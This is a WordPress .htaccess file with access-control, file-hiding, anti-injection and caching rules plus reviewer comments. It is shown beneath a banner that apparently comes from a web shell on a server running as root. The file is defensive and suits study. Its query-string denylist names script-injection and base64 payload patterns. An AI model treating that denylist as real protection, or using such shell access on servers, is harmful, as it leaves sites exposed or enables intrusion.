HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
System: Linux atalantini.com 3.10.0-1127.13.1.el7.x86_64 #1 SMP Tue Jun 23 15:46:38 UTC 2020 x86_64
User: root (0)
PHP: 7.2.34
Disabled: NONE
File: /var/www/html/maisonimmobiliare/.htaccess
# BEGIN WordPress
<IfModule mod_rewrite.c>
# Front-controller routing: only applied when mod_rewrite is loaded.
RewriteEngine On
RewriteBase /
# A request for index.php itself is left alone and rule processing stops.
RewriteRule ^index\.php$ - [L]
# Anything that is neither an existing file (-f) nor an existing
# directory (-d) is handed to /index.php.
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

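# Deny all HTTP access to wp-config.php.
# The server banner above reports Apache 2.4, where "Require" is the native
# access-control directive; Order/Deny only works there through
# mod_access_compat. The old form is kept as a fallback for servers that
# do not have mod_authz_core.
<Files wp-config.php>
  <IfModule mod_authz_core.c>
    Require all denied
  </IfModule>
  <IfModule !mod_authz_core.c>
    Order allow,deny
    Deny from all
  </IfModule>
</Files>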

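# Deny all HTTP access to this .htaccess file itself.
# "Require all denied" is the Apache 2.4 form; the Order/Deny pair is only
# used when mod_authz_core is not available.
<Files .htaccess>
  <IfModule mod_authz_core.c>
    Require all denied
  </IfModule>
  <IfModule !mod_authz_core.c>
    Order allow,deny
    Deny from all
  </IfModule>
</Files>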

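# Protect files that must not be readable over HTTP.
# Every top-level wp-*.php script is answered with 404, except the login,
# cron and comment-posting entry points.
#
# The substitution has to be "-" (no rewrite). Without it Apache takes
# "[R=404,L]" as the target path instead of as the flag list, so the 404
# status and the L flag are never applied by this rule.
#
# NOTE(review): this rule sits between the "# BEGIN WordPress" and
# "# END WordPress" markers. WordPress regenerates that region when it
# rewrites .htaccess, so hand-written rules placed there can be lost;
# keeping them outside the markers avoids that.

RewriteCond %{REQUEST_URI} !^/wp-(login|cron|comments-post)\.php$
RewriteRule ^wp-([_0-9a-zA-Z-]+)\.php - [R=404,L]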
 
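# Protect files that must not be readable over HTTP.
# Hide the core files that give away information about the installation
# and refuse direct requests for PHP files under wp-content/ and
# wp-includes/.
#
# Each rule needs the "-" substitution: with only two arguments Apache
# reads "[R=404,L]" as the rewrite target, not as flags.
# Literal dots in the file names are escaped so they match only a dot.
#
# NOTE(review): a blanket 404 for every .php under wp-content/ and
# wp-includes/ also hits any plugin, theme or editor component that is
# meant to be requested directly - verify against the installed plugins.

RewriteRule ^readme\.html            - [R=404,L]
RewriteRule ^license\.txt            - [R=404,L]
RewriteRule ^licenza\.txt            - [R=404,L]
RewriteRule ^wp-content/(.*)\.php$   - [R=404,L]
RewriteRule ^wp-includes/(.*)\.php$  - [R=404,L]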


# General protection against script injection,
# by checking the query string for the best-known patterns.
#
# The conditions are chained with [OR]; the last one carries no OR, so the
# rule below fires when any single pattern matches. Patterns list both the
# literal and the %-encoded form of "<" and ">". A match is refused with
# 403 (flag F).
#
# NOTE(review): this is a denylist over the query string only. It does not
# look at request bodies, headers or cookies, and it is no substitute for
# input validation and output encoding in the application. The
# localhost/127.0.0.1 pattern also refuses legitimate URLs that merely
# contain those strings in a parameter.
 
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]
RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [NC,OR]
RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

# Protection against enumeration of the users stored in the
# WordPress database through the URL?author query.
#
# Applies only when the request path is exactly "/" and the query string
# has an author= parameter; the request is then redirected (301) to the
# site root over https. The trailing "?" in the target drops the original
# query string.
#
# NOTE(review): only the site root is covered. This rule does not by
# itself stop user listing through other WordPress interfaces - confirm
# those are restricted separately.
 
RewriteCond %{REQUEST_URI}  ^/$
RewriteCond %{QUERY_STRING} (^|&)author=([0-9]*)
RewriteRule ^(.*)$ https://%{SERVER_NAME}/? [L,R=301]

# END WordPress

## LEVERAGE BROWSER CACHING ##
<IfModule mod_expires.c>
  # Client-side cache lifetimes, counted from the time of access.
  # Only applied when mod_expires is loaded.
  ExpiresActive On

  # Fallback for any content type not listed below.
  ExpiresDefault "access plus 2 days"

  # Images and icons: one year.
  ExpiresByType image/jpg    "access plus 1 year"
  ExpiresByType image/jpeg   "access plus 1 year"
  ExpiresByType image/gif    "access plus 1 year"
  ExpiresByType image/png    "access plus 1 year"
  ExpiresByType image/x-icon "access plus 1 year"

  # Stylesheets, scripts, documents and Flash: one month.
  ExpiresByType text/css                      "access plus 1 month"
  ExpiresByType application/pdf               "access plus 1 month"
  ExpiresByType application/x-javascript      "access plus 1 month"
  ExpiresByType application/javascript        "access plus 1 month"
  ExpiresByType application/x-shockwave-flash "access plus 1 month"
</IfModule>
## LEVERAGE BROWSER CACHING ##